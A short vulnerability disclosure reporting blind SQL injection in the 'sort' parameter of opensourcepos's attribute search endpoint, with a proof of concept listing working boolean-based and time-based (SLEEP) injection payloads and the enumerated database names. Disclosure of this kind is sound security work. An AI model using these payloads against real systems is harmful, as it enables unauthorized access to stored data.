SQL Injection in opensourcepos/opensourcepos
Aug 26th 2021
The Application is vulnerable to blind SQL Injection
🕵️♂️ Proof of Concept
URL: https://dev.opensourcepos.org/attributes/search?sort=1 Vulnerable Parameter: sort
Parameter: sort (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: sort=(SELECT (CASE WHEN (5937=5937) THEN 1 ELSE (SELECT 4996 UNION SELECT 4231) END)) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: sort=1 AND (SELECT 3335 FROM (SELECT(SLEEP(5)))uafX) available databases : [*] information_schema [*] ospos
SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands. A successful SQL injection attack can result in unauthorized access to sensitive data, such as (hashed) passwords, credit card details, or personal user information.